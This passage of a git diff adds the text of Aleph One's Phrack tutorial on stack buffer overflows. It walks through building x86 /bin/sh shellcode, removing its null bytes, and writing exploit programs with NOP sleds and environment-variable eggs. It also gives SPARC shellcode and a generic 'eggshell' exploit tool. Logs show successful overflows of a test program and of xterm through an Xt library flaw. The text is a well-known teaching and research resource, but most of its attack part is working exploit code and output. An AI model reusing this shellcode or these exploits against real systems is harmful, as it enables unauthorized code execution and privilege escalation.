+        movl   $0x1, %eax		# 5 bytes
+        movl   $0x0, %ebx		# 5 bytes
+	int    $0x80			# 2 bytes
+        call   offset-to-popl           # 5 bytes
+        /bin/sh string goes here.
+------------------------------------------------------------------------------
+
+   Calculating the offsets from jmp to call, from call to popl, from
+the string address to the array, and from the string address to the null
+long word, we now have:
+
+------------------------------------------------------------------------------
+        jmp    0x26                     # 2 bytes
+        popl   %esi                     # 1 byte
+        movl   %esi,0x8(%esi)           # 3 bytes
+        movb   $0x0,0x7(%esi)		# 4 bytes
+        movl   $0x0,0xc(%esi)           # 7 bytes
+        movl   $0xb,%eax                # 5 bytes
+        movl   %esi,%ebx                # 2 bytes
+        leal   0x8(%esi),%ecx           # 3 bytes
+        leal   0xc(%esi),%edx           # 3 bytes
+        int    $0x80                    # 2 bytes
+        movl   $0x1, %eax		# 5 bytes
+        movl   $0x0, %ebx		# 5 bytes
+	int    $0x80			# 2 bytes
+        call   -0x2b                    # 5 bytes
+        .string \"/bin/sh\"		# 8 bytes
+------------------------------------------------------------------------------
+
+   Looks good. To make sure it works correctly we must compile it and run it.
+But there is a problem.  Our code modifies itself, but most operating system
+mark code pages read-only.  To get around this restriction we must place the
+code we wish to execute in the stack or data segment, and transfer control
+to it.  To do so we will place our code in a global array in the data
+segment.  We need first a hex representation of the binary code. Lets
+compile it first, and then use gdb to obtain it.
+
+shellcodeasm.c
+------------------------------------------------------------------------------
+void main() {
+__asm__("
+        jmp    0x2a                     # 3 bytes
+        popl   %esi                     # 1 byte
+        movl   %esi,0x8(%esi)           # 3 bytes
+        movb   $0x0,0x7(%esi)           # 4 bytes
+        movl   $0x0,0xc(%esi)           # 7 bytes
+        movl   $0xb,%eax                # 5 bytes
+        movl   %esi,%ebx                # 2 bytes
+        leal   0x8(%esi),%ecx           # 3 bytes
+        leal   0xc(%esi),%edx           # 3 bytes
+        int    $0x80                    # 2 bytes
+        movl   $0x1, %eax               # 5 bytes
+        movl   $0x0, %ebx               # 5 bytes
+        int    $0x80                    # 2 bytes
+        call   -0x2f                    # 5 bytes
+        .string \"/bin/sh\"             # 8 bytes
+");
+}
+------------------------------------------------------------------------------
+
+------------------------------------------------------------------------------
+[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
+[aleph1]$ gdb shellcodeasm
+GDB is free software and you are welcome to distribute copies of it
+ under certain conditions; type "show copying" to see the conditions.
+There is absolutely no warranty for GDB; type "show warranty" for details.
+GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
+(gdb) disassemble main
+Dump of assembler code for function main:
+0x8000130 <main>:       pushl  %ebp
+0x8000131 <main+1>:     movl   %esp,%ebp
+0x8000133 <main+3>:     jmp    0x800015f <main+47>
+0x8000135 <main+5>:     popl   %esi
+0x8000136 <main+6>:     movl   %esi,0x8(%esi)
+0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
+0x800013d <main+13>:    movl   $0x0,0xc(%esi)
+0x8000144 <main+20>:    movl   $0xb,%eax
+0x8000149 <main+25>:    movl   %esi,%ebx
+0x800014b <main+27>:    leal   0x8(%esi),%ecx
+0x800014e <main+30>:    leal   0xc(%esi),%edx
+0x8000151 <main+33>:    int    $0x80
+0x8000153 <main+35>:    movl   $0x1,%eax
+0x8000158 <main+40>:    movl   $0x0,%ebx
+0x800015d <main+45>:    int    $0x80
+0x800015f <main+47>:    call   0x8000135 <main+5>
+0x8000164 <main+52>:    das
+0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
+0x8000168 <main+56>:    das
+0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
+0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
+End of assembler dump.
+(gdb) x/bx main+3
+0x8000133 <main+3>:     0xeb
+(gdb)
+0x8000134 <main+4>:     0x2a
+(gdb)
+.
+.
+.
+------------------------------------------------------------------------------
+
+testsc.c
+------------------------------------------------------------------------------
+char shellcode[] =
+	"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
+	"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
+	"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
+	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
+
+void main() {
+   int *ret;
+
+   ret = (int *)&ret + 2;
+   (*ret) = (int)shellcode;
+
+}
+------------------------------------------------------------------------------
+------------------------------------------------------------------------------
+[aleph1]$ gcc -o testsc testsc.c
+[aleph1]$ ./testsc
+$ exit
+[aleph1]$
+------------------------------------------------------------------------------
+
+   It works! But there is an obstacle.  In most cases we'll be trying to
+overflow a character buffer.  As such any null bytes in our shellcode will be
+considered the end of the string, and the copy will be terminated.  There must
+be no null bytes in the shellcode for the exploit to work.  Let's try to
+eliminate the bytes (and at the same time make it smaller).
+
+           Problem instruction:                 Substitute with:
+           --------------------------------------------------------
+           movb   $0x0,0x7(%esi)                xorl   %eax,%eax
+	   molv   $0x0,0xc(%esi)                movb   %eax,0x7(%esi)
+                                                movl   %eax,0xc(%esi)
+           --------------------------------------------------------
+           movl   $0xb,%eax                     movb   $0xb,%al
+           --------------------------------------------------------
+           movl   $0x1, %eax                    xorl   %ebx,%ebx
+           movl   $0x0, %ebx                    movl   %ebx,%eax
+                                                inc    %eax
+           --------------------------------------------------------
+
+   Our improved code:
+
+shellcodeasm2.c
+------------------------------------------------------------------------------
+void main() {
+__asm__("
+        jmp    0x1f                     # 2 bytes
+        popl   %esi                     # 1 byte
+        movl   %esi,0x8(%esi)           # 3 bytes
+        xorl   %eax,%eax                # 2 bytes
+	movb   %eax,0x7(%esi)		# 3 bytes
+        movl   %eax,0xc(%esi)           # 3 bytes
+        movb   $0xb,%al                 # 2 bytes
+        movl   %esi,%ebx                # 2 bytes
+        leal   0x8(%esi),%ecx           # 3 bytes
+        leal   0xc(%esi),%edx           # 3 bytes
+        int    $0x80                    # 2 bytes
+        xorl   %ebx,%ebx                # 2 bytes
+        movl   %ebx,%eax                # 2 bytes
+        inc    %eax                     # 1 bytes
+        int    $0x80                    # 2 bytes
+        call   -0x24                    # 5 bytes
+        .string \"/bin/sh\"             # 8 bytes
+					# 46 bytes total
+");
+}
+------------------------------------------------------------------------------
+
+   And our new test program:
+
+testsc2.c
+------------------------------------------------------------------------------
+char shellcode[] =
+	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+	"\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+void main() {
+   int *ret;
+
+   ret = (int *)&ret + 2;
+   (*ret) = (int)shellcode;
+
+}
+------------------------------------------------------------------------------
+------------------------------------------------------------------------------
+[aleph1]$ gcc -o testsc2 testsc2.c
+[aleph1]$ ./testsc2
+$ exit
+[aleph1]$
+------------------------------------------------------------------------------
+
+
+                              Writing an Exploit
+                              ~~~~~~~~~~~~~~~~~~
+                          (or how to mung the stack)
+                          ~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+   Lets try to pull all our pieces together.  We have the shellcode.  We know
+it must be part of the string which we'll use to overflow the buffer.  We 
+know we must point the return address back into the buffer.  This example will
+demonstrate these points:
+
+overflow1.c
+------------------------------------------------------------------------------
+char shellcode[] =
+        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+char large_string[128];
+
+void main() {
+  char buffer[96];
+  int i;
+  long *long_ptr = (long *) large_string;
+
+  for (i = 0; i < 32; i++)
+    *(long_ptr + i) = (int) buffer;
+
+  for (i = 0; i < strlen(shellcode); i++)
+    large_string[i] = shellcode[i];
+
+  strcpy(buffer,large_string);
+}
+------------------------------------------------------------------------------
+
+------------------------------------------------------------------------------
+[aleph1]$ gcc -o exploit1 exploit1.c
+[aleph1]$ ./exploit1
+$ exit
+exit
+[aleph1]$
+------------------------------------------------------------------------------
+
+   What we have done above is filled the array large_string[] with the
+address of buffer[], which is where our code will be.  Then we copy our
+shellcode into the beginning of the large_string string.  strcpy() will then
+copy large_string onto buffer without doing any bounds checking, and will
+overflow the return address, overwriting it with the address where our code
+is now located.  Once we reach the end of main and it tried to return it
+jumps to our code, and execs a shell.
+
+   The problem we are faced when trying to overflow the buffer of another
+program is trying to figure out at what address the buffer (and thus our
+code) will be.  The answer is that for every program the stack will
+start at the same address.  Most programs do not push more than a few hundred
+or a few thousand bytes into the stack at any one time.  Therefore by knowing
+where the stack starts we can try to guess where the buffer we are trying to
+overflow will be.  Here is a little program that will print its stack
+pointer:
+
+sp.c
+------------------------------------------------------------------------------
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+void main() {
+  printf("0x%x\n", get_sp());
+}
+------------------------------------------------------------------------------
+
+------------------------------------------------------------------------------
+[aleph1]$ ./sp
+0x8000470
+[aleph1]$
+------------------------------------------------------------------------------
+
+   Lets assume this is the program we are trying to overflow is:
+
+vulnerable.c
+------------------------------------------------------------------------------
+void main(int argc, char *argv[]) {
+  char buffer[512];
+
+  if (argc > 1)
+    strcpy(buffer,argv[1]);
+}
+------------------------------------------------------------------------------
+
+   We can create a program that takes as a parameter a buffer size, and an
+offset from its own stack pointer (where we believe the buffer we want to
+overflow may live).  We'll put the overflow string in an environment variable
+so it is easy to manipulate:
+
+exploit2.c
+------------------------------------------------------------------------------
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  ptr += 4;
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"EGG=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+------------------------------------------------------------------------------
+
+   Now we can try to guess what the buffer and offset should be:
+
+------------------------------------------------------------------------------
+[aleph1]$ ./exploit2 500
+Using address: 0xbffffdb4
+[aleph1]$ ./vulnerable $EGG
+[aleph1]$ exit
+[aleph1]$ ./exploit2 600
+Using address: 0xbffffdb4
+[aleph1]$ ./vulnerable $EGG
+Illegal instruction
+[aleph1]$ exit
+[aleph1]$ ./exploit2 600 100
+Using address: 0xbffffd4c
+[aleph1]$ ./vulnerable $EGG
+Segmentation fault
+[aleph1]$ exit
+[aleph1]$ ./exploit2 600 200
+Using address: 0xbffffce8
+[aleph1]$ ./vulnerable $EGG
+Segmentation fault
+[aleph1]$ exit
+.
+.
+.
+[aleph1]$ ./exploit2 600 1564
+Using address: 0xbffff794
+[aleph1]$ ./vulnerable $EGG
+$
+------------------------------------------------------------------------------
+
+   As we can see this is not an efficient process.  Trying to guess the
+offset even while knowing where the beginning of the stack lives is nearly
+impossible.  We would need at best a hundred tries, and at worst a couple of
+thousand.  The problem is we need to guess *exactly* where the address of our 
+code will start.  If we are off by one byte more or less we will just get a
+segmentation violation or a invalid instruction.  One way to increase our
+chances is to pad the front of our overflow buffer with NOP instructions.
+Almost all processors have a NOP instruction that performs a null operation.
+It is usually used to delay execution for purposes of timing.  We will take
+advantage of it and fill half of our overflow buffer with them.  We will place
+our shellcode at the center, and then follow it with the return addresses. If
+we are lucky and the return address points anywhere in the string of NOPs,
+they will just get executed until they reach our code.  In the Intel
+architecture the NOP instruction is one byte long and it translates to 0x90
+in machine code.  Assuming the stack starts at address 0xFF, that S stands for
+shell code, and that N stands for a NOP instruction the new stack would look
+like this:
+
+bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
+memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
+           buffer                sfp   ret   a     b     c
+
+<------   [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
+                 ^                     |
+                 |_____________________|
+top of                                                            bottom of
+stack                                                                 stack
+
+   The new exploits is then:
+
+exploit3.c
+------------------------------------------------------------------------------
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define NOP                            0x90
+
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  for (i = 0; i < bsize/2; i++)
+    buff[i] = NOP;
+
+  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"EGG=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+------------------------------------------------------------------------------
+
+   A good selection for our buffer size is about 100 bytes more than the size
+of the buffer we are trying to overflow.  This will place our code at the end
+of the buffer we are trying to overflow, giving a lot of space for the NOPs,
+but still overwriting the return address with the address we guessed.  The
+buffer we are trying to overflow is 512 bytes long, so we'll use 612.  Let's
+try to overflow our test program with our new exploit:
+
+------------------------------------------------------------------------------
+[aleph1]$ ./exploit3 612
+Using address: 0xbffffdb4
+[aleph1]$ ./vulnerable $EGG
+$
+------------------------------------------------------------------------------
+
+   Whoa!  First try!  This change has improved our chances a hundredfold. 
+Let's try it now on a real case of a buffer overflow.  We'll use for our
+demonstration the buffer overflow on the Xt library.  For our example, we'll 
+use xterm (all programs linked with the Xt library are vulnerable). You must
+be running an X server and allow connections to it from the localhost.  Set
+your DISPLAY variable accordingly.
+
+------------------------------------------------------------------------------
+[aleph1]$ export DISPLAY=:0.0
+[aleph1]$ ./exploit3 1124
+Using address: 0xbffffdb4
+[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
+Warning: Color name "^1FF
+                           
+                            V
+
+1@/bin/sh
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+^C
+[aleph1]$ exit
+[aleph1]$ ./exploit3 2148 100
+Using address: 0xbffffd48
+[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
+Warning: Color name "^1FF
+                           
+                            V
+
+1@/bin/shHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
+
+
+
+
+
+
+
+
+HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
+
+
+
+
+
+
+
+
+HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
+
+
+
+
+
+
+
+
+HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
+
+
+
+
+
+
+
+
+HHHHHHHHHHHH
+Warning: some arguments in previous message were lost
+Illegal instruction
+[aleph1]$ exit
+.
+.
+.
+[aleph1]$ ./exploit4 2148 600
+Using address: 0xbffffb54
+[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
+Warning: Color name "^1FF
+                           
+                            V
+
+1@/bin/shTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
+
+
+
+
+
+
+
+
+TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
+
+
+
+
+
+
+
+
+TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
+
+
+
+
+
+
+
+
+TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
+
+
+
+
+
+
+
+
+TTTTTTTTTTTT
+Warning: some arguments in previous message were lost
+bash$
+------------------------------------------------------------------------------
+
+   Eureka! Less than a dozen tries and we found the magic numbers. If xterm
+where installed suid root this would now be a root shell.
+
+
+                            Small Buffer Overflows
+                            ~~~~~~~~~~~~~~~~~~~~~~
+
+   There will be times when the buffer you are trying to overflow is so
+small that either the shellcode wont fit into it, and it will overwrite the
+return address with instructions instead of the address of our code, or the
+number of NOPs you can pad the front of the string with is so small that the
+chances of guessing their address is minuscule.  To obtain a shell from these
+programs we will have to go about it another way.  This particular approach
+only works when you have access to the program's environment variables.
+
+   What we will do is place our shellcode in an environment variable, and
+then overflow the buffer with the address of this variable in memory.  This
+method also increases your changes of the exploit working as you can make
+the environment variable holding the shell code as large as you want.
+
+   The environment variables are stored in the top of the stack when the
+program is started, any modification by setenv() are then allocated
+elsewhere.  The stack at the beginning then looks like this:
+
+
+      <strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp>
+
+   Our new program will take an extra variable, the size of the variable
+containing the shellcode and NOPs. Our new exploit now looks like this:
+
+exploit4.c
+------------------------------------------------------------------------------
+#include <stdlib.h>
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define DEFAULT_EGG_SIZE               2048
+#define NOP                            0x90
+
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_esp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) {
+  char *buff, *ptr, *egg;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i, eggsize=DEFAULT_EGG_SIZE;
+
+  if (argc > 1) bsize   = atoi(argv[1]);
+  if (argc > 2) offset  = atoi(argv[2]);
+  if (argc > 3) eggsize = atoi(argv[3]);
+
+
+  if (!(buff = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+  if (!(egg = malloc(eggsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_esp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  ptr = egg;
+  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
+    *(ptr++) = NOP;
+
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+  egg[eggsize - 1] = '\0';
+
+  memcpy(egg,"EGG=",4);
+  putenv(egg);
+  memcpy(buff,"RET=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+------------------------------------------------------------------------------
+
+   Lets try our new exploit with our vulnerable test program:
+
+------------------------------------------------------------------------------
+[aleph1]$ ./exploit4 768
+Using address: 0xbffffdb0
+[aleph1]$ ./vulnerable $RET
+$
+------------------------------------------------------------------------------
+
+   Works like a charm. Now lets try it on xterm:
+
+------------------------------------------------------------------------------
+[aleph1]$ export DISPLAY=:0.0
+[aleph1]$ ./exploit4 2148
+Using address: 0xbffffdb0
+[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
+Warning: Color name
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Warning: some arguments in previous message were lost
+$
+------------------------------------------------------------------------------
+
+   On the first try!  It has certainly increased our odds.  Depending how 
+much environment data the exploit program has compared with the program 
+you are trying to exploit the guessed address may be to low or to high. 
+Experiment both with positive and negative offsets.
+
+
+                              Finding Buffer Overflows
+                              ~~~~~~~~~~~~~~~~~~~~~~~~
+
+   As stated earlier, buffer overflows are the result of stuffing more
+information into a buffer than it is meant to hold.  Since C does not have any
+built-in bounds checking, overflows often manifest themselves as writing past
+the end of a character array.  The standard C library provides a number of
+functions for copying or appending strings, that perform no boundary checking.
+They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions 
+operate on null-terminated strings, and do not check for overflow of the 
+receiving string.  gets() is a function that reads a line from stdin into 
+a buffer until either a terminating newline or EOF.  It performs no checks for
+buffer overflows.  The scanf() family of functions can also be a problem if 
+you are matching a sequence of non-white-space characters (%s), or matching a 
+non-empty sequence of characters from a specified set (%[]), and the array 
+pointed to by the char pointer, is not large enough to accept the whole 
+sequence of characters, and you have not defined the optional maximum field 
+width.  If the target of any of these functions is a buffer of static size, 
+and its other argument was somehow derived from user input there is a good
+posibility that you might be able to exploit a buffer overflow.
+
+   Another usual programming construct we find is the use of a while loop to
+read one character at a time into a buffer from stdin or some file until the
+end of line, end of file, or some other delimiter is reached.  This type of
+construct usually uses one of these functions: getc(), fgetc(), or getchar().
+If there is no explicit checks for overflows in the while loop, such programs 
+are easily exploited.
+
+   To conclude, grep(1) is your friend.  The sources for free operating
+systems and their utilities is readily available.  This fact becomes quite
+interesting once you realize that many comercial operating systems utilities
+where derived from the same sources as the free ones.  Use the source d00d.
+
+
+     Appendix A - Shellcode for Different Operating Systems/Architectures
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+i386/Linux
+------------------------------------------------------------------------------
+        jmp    0x1f
+        popl   %esi
+        movl   %esi,0x8(%esi)
+        xorl   %eax,%eax
+	movb   %eax,0x7(%esi)
+        movl   %eax,0xc(%esi)
+        movb   $0xb,%al
+        movl   %esi,%ebx
+        leal   0x8(%esi),%ecx
+        leal   0xc(%esi),%edx
+        int    $0x80
+        xorl   %ebx,%ebx
+        movl   %ebx,%eax
+        inc    %eax
+        int    $0x80
+        call   -0x24
+        .string \"/bin/sh\"
+------------------------------------------------------------------------------
+
+SPARC/Solaris
+------------------------------------------------------------------------------
+        sethi   0xbd89a, %l6
+        or      %l6, 0x16e, %l6
+        sethi   0xbdcda, %l7
+        and     %sp, %sp, %o0
+        add     %sp, 8, %o1
+        xor     %o2, %o2, %o2
+        add     %sp, 16, %sp
+        std     %l6, [%sp - 16]
+        st      %sp, [%sp - 8]
+        st      %g0, [%sp - 4]
+        mov     0x3b, %g1
+        ta      8
+        xor     %o7, %o7, %o0
+        mov     1, %g1
+        ta      8
+------------------------------------------------------------------------------
+
+SPARC/SunOS
+------------------------------------------------------------------------------
+        sethi   0xbd89a, %l6
+        or      %l6, 0x16e, %l6
+        sethi   0xbdcda, %l7
+        and     %sp, %sp, %o0
+        add     %sp, 8, %o1
+        xor     %o2, %o2, %o2
+        add     %sp, 16, %sp
+        std     %l6, [%sp - 16]
+        st      %sp, [%sp - 8]
+        st      %g0, [%sp - 4]
+        mov     0x3b, %g1
+	mov	-0x1, %l5
+        ta      %l5 + 1
+        xor     %o7, %o7, %o0
+        mov     1, %g1
+        ta      %l5 + 1
+------------------------------------------------------------------------------
+
+
+                 Appendix B - Generic Buffer Overflow Program
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+shellcode.h
+------------------------------------------------------------------------------
+#if defined(__i386__) && defined(__linux__)
+
+#define NOP_SIZE	1
+char nop[] = "\x90";
+char shellcode[] =
+  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)
+
+#define NOP_SIZE	4
+char nop[]="\xac\x15\xa1\x6e";
+char shellcode[] =
+  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
+  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
+  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
+  "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
+
+unsigned long get_sp(void) {
+  __asm__("or %sp, %sp, %i0");
+}
+
+#elif defined(__sparc__) && defined(__sun__)
+
+#define NOP_SIZE        4
+char nop[]="\xac\x15\xa1\x6e";
+char shellcode[] =
+  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
+  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
+  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
+  "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
+
+unsigned long get_sp(void) {
+  __asm__("or %sp, %sp, %i0");
+}
+
+#endif
+------------------------------------------------------------------------------
+
+eggshell.c
+------------------------------------------------------------------------------
+/*
+ * eggshell v1.0
+ *
+ * Aleph One / aleph1@underground.org
+ */
+#include <stdlib.h>
+#include <stdio.h>
+#include "shellcode.h"
+
+#define DEFAULT_OFFSET                    0
+#define DEFAULT_BUFFER_SIZE             512
+#define DEFAULT_EGG_SIZE               2048
+
+void usage(void);
+
+void main(int argc, char *argv[]) {
+  char *ptr, *bof, *egg;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;
+
+  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
+    switch (c) {
+      case 'a':
+        align = atoi(optarg);
+        break;
+      case 'b':
+        bsize = atoi(optarg);
+        break;
+      case 'e':
+        eggsize = atoi(optarg);
+        break;
+      case 'o':
+        offset = atoi(optarg);
+        break;
+      case '?':
+        usage();
+        exit(0);
+    }
+
+  if (strlen(shellcode) > eggsize) {
+    printf("Shellcode is larger the the egg.\n");
+    exit(0);
+  }
+
+  if (!(bof = malloc(bsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+  if (!(egg = malloc(eggsize))) {
+    printf("Can't allocate memory.\n");
+    exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n",
+    bsize, eggsize, align);
+  printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);
+
+  addr_ptr = (long *) bof;
+  for (i = 0; i < bsize; i+=4)
+    *(addr_ptr++) = addr;
+
+  ptr = egg;
+  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
+    for (n = 0; n < NOP_SIZE; n++) {
+      m = (n + align) % NOP_SIZE;
+      *(ptr++) = nop[m];
+    }
+
+  for (i = 0; i < strlen(shellcode); i++)
+    *(ptr++) = shellcode[i];
+
+  bof[bsize - 1] = '\0';
+  egg[eggsize - 1] = '\0';
+
+  memcpy(egg,"EGG=",4);
+  putenv(egg);
+
+  memcpy(bof,"BOF=",4);
+  putenv(bof);
+  system("/bin/sh");
+}
+
+void usage(void) {
+  (void)fprintf(stderr,
+    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n");
+}
+------------------------------------------------------------------------------
diff --git a/phrack49/15.txt b/phrack49/15.txt
new file mode 100644
index 0000000..5f77986
--- /dev/null
